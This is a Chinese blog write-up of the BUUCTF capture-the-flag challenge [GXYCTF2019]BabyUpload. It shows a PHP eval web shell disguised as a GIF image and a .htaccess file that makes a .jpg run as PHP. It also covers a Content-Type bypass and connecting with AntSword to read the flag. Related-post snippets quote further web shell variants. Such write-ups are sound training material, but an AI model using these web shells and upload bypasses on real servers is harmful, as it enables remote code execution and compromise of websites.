web buuctf [GXYCTF2019]BabyUpload1

最新推荐文章于 2024-03-03 12:02:10 发布
最新推荐文章于 2024-03-03 12:02:10 发布
阅读量809 收藏 3
点赞数
文章标签: .htaccess文件 文件上传漏洞
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/weixin_44214568/article/details/123654745
版权

考点:.htaccess文件,

抓包修改content-type

文件上传漏洞

1.如题:

传统上传文件题目,试了试常规的几个类型,php,phtml,php3,txt,png都不行,最后上传成功了png格式的,上传我之前写好的图片马,一句话木马内容如下:

GIF89a?<script language="php">@eval($_POST[dd]);</script>

2.因为上传的是图片格式的,要将该文件变成php文件的进行上传,就需要上传.htaccess文件

内容如下

<FilesMatch "oneq.jpg">
SetHandler application/x-httpd-php
</FilesMatch>
//将文件名为oneq.jpg格式的文件以Php形式执行

提示上传失败,抓包,修改包里的content-type

 继续上传,成功

3.用post参数,令dd=phpinfo();

执行,有回显,证明上传成功

令dd=var_dump("/");

回显未出现flag,

利用蚁剑连接,url填写../oneq.jpg,密码是dd

在根目录下发现flag文件,打开即得flag{e69e7302-df6b-43e3-9305-94b837996cbc}

半杯雨水敬过客
关注
  • 0
    点赞
  • 3
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
CTF-WEB[GXYCTF 2019]BabyUpload
02-08
CTF-WEB[GXYCTF 2019]BabyUpload
BUUCTFBabyUpload[GXYCTF2019]
金 帛的博客
06-11 593
BUUCTF的wp
BUU实战笔记——[GXYCTF2019]BabyUpload 1
qq_51175992的博客
07-14 840
对于文件上传一般就是先找到可以上传的文件类型,然后看传上去的文件是否可以正常使用,若不行,再考虑配置文件的方法。
[GXYCTF2019]BabyUpload1
qq_64201116的博客
05-14 2894
小小的文件上传,拿下!
BUUCTF_Web题目题解记录1
Altering_Ji的博客
07-11 2438
记录一下buu 刷题网站上最近做的三道web题目:[GYCTF2020]Blacklist(堆叠注入)、[网鼎杯 2020 青龙组]AreUSerialz(反序列化)、[GXYCTF2019]BabyUpload文件上传
[GXYCTF2019]BabyUpload1 -- 题目分析与详解
2302_79800344的博客
03-03 1486
代码中并没有写传统的一句话木马,因为直接写一句话木马需要关闭系统防火墙。.htaccess 文件
BUUCTFweb之强网杯2019随便注
12-14
1’ : 报错 1’ #:回显正常 1’ order by 1 #: 正常(经测试列数为2–此处小白暗自窃喜) 1’ union select 1,2#: 回显 如图 看来此方法是行不通了,但经过苦苦寻求,了解到了堆叠注入: 库:1’;show databases;# ...
BUUCTF部分web题目
最新发布
05-06
写题记录
Xilinx_Vivado_SDK_Web_2019.1_0524_1430_Win64.exe
06-28
下载请注意操作系统! Vivado HLx 2019.1:WebPACK 和版本 —Windows 自解压 Web 安装程序 (EXE - 64.62 MB)
Xilinx_Vivado_SDK_Web_2019.1_0524_1430_Lin64.bin
06-28
下载请注意操作系统! Vivado HLx 2019.1:WebPACK 和版本 — Linux 自解压 Web 安装程序 (BIN - 115.05 MB)
BUUCTF之[GXYCTF2019]BabyUpload-------文件解析漏洞
weixin_44632787的博客
06-19 1890
BUUCTF之[GXYCTF2019]BabyUpload-------文件解析漏洞.htaccess) 早上遇到一个文件解析漏洞,下午又遇到一个。。。。好吧,看来文件解析漏洞在CTF中也是很重要的一个知识点!!! 首先启动挑战项目 先正常的上传一句话木马: GIF89a? <script language="php">eval($_POST['zyh']);</script> 我经常用这样的一句话木马,为了防止php文件内容被过滤啥的… 所以,把传输的文件名改回1.pn
BUUCTF web [GXYCTF2019]BabyUpload1 详解
llki666的博客
08-27 2353
打开后是这样的, 遇到文件上传题,先传一张普通图片试试, 提到了上传类型,用burpsuite抓包可以修改上传类型。再试试上传一句话木马: 提到后缀名不能有ph,也用burp suite能改。 准备一个文本文档写一句话木马: <script language='php'>eval($_POST['v']);</script> 推荐用这个,可以避开很多坑。然后直接把文本的后缀名txt改成jpg就行。 上传试试: 成功!现在需要把上传成功...
BUUCTF Web1
ookami6497的博客
12-11 881
web | CTF】BUUCTF [GXYCTF2019]BabyUpload1
weixin_46301214的博客
09-05 323
通常apache和nginx都包含有 .htaccess 配置文件,可以试试这个漏洞。后来发现问题在Content-Type里,只能上传 image/jpeg 类型。但是发现还是能识别到,那就说明有php的特征被识别到了。那就需要使用图片码,但没有文件包含漏洞,无法执行。所以就采用上传.htaccess配置文件来。就改用JavaScript变成php来执行。然后更改文件名为jpeg后缀,上传。某文件变成php来执行。
BUUCTF [web专项29][GXYCTF2019]BabyUpload
yanglinchiji的博客
11-07 89
成功,再次上传 .htaccess 来修改后缀(吸取了上次文件上传题的经验,成功上传的结果没有index,不需要用.user.ini)发现后缀不能带ph,那么就猜测是需要上传木马图上去,在上传一些文件来修改上传目录的指定文件后缀为php来进行执行。上传成功,我们先到上传目录下的1.jpg下看看是否执行了。已经执行了,那么我们就需要蚁剑连上去即可。那就需要抓包修改上传类型来绕过检测了。进入后还是发现是个文件上传题。在根目录下即可获得flag。还是用以前总结出来的方法。
BUUCTF [GXYCTF2019]BabyUpload 1详解(.htaccess配置文件特性)
m0_73734159的博客
11-29 1539
概述来说,htaccess文件是Apache服务器中的一个配置文件,它负责相关目录下的网页配置。通过htaccess文件,可以帮我们实现:网页301重定向、自定义404错误页面、改变文件扩展名、允许/阻止特定的用户或者目录的访问、禁止目录列表、配置默认文档等功能。通过源码可以看出这道文件上传题目主要还是考察.htaccess配置文件的特性。倘若不先上传.htaccess配置文件,那么后台服务器就无法解析php代码。先截断数据包再把上传的111.jpg文件更名为.htaccess文件。右键Repeater。
BUUCTF学习笔记-BabyUpLoad
Emmawas的博客
09-28 703
考点:.htaccess绕过,文件内容为 AddType application/x-httpd-php .jpg,讲jpg文件按照php文件使用
buuctf-BabyUpload
m0_62094846的博客
03-26 890
上传php文件,过滤后缀 上传jpg文件 上传png文件,和文件类型有关(Content-Type) 所以应该要上传jpg文件类型 上传一句话木马就会出现问题,筛查后发现是<?php 改一下木马格式就可以了 <script language="php">eval($_REQUEST[value])</script> 但是后缀无法修改成php类型,各种方式都试过了 想到.htaccess和.user.ini 和文件类型有关,就修...
buuctf web 极客大挑战2019
08-24
嗨!对于BUUCTF Web极客大挑战2019,我了解到它是一个网络安全比赛,由北方工业大学举办。这个比赛旨在考察参赛者的网络攻防能力和Web漏洞挖掘技术。比赛的题目涵盖了Web安全的各个方面,包括但不限于漏洞利用、代码审计和网络协议等。参赛者需要通过解决各个题目来获取相应的flag,以证明自己的能力。如果你有具体的问题或需要更详细的信息,我会尽力帮助你。

“相关推荐”对你有帮助么?

  • 非常没帮助
  • 没帮助
  • 一般
  • 有帮助
  • 非常有帮助
提交
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值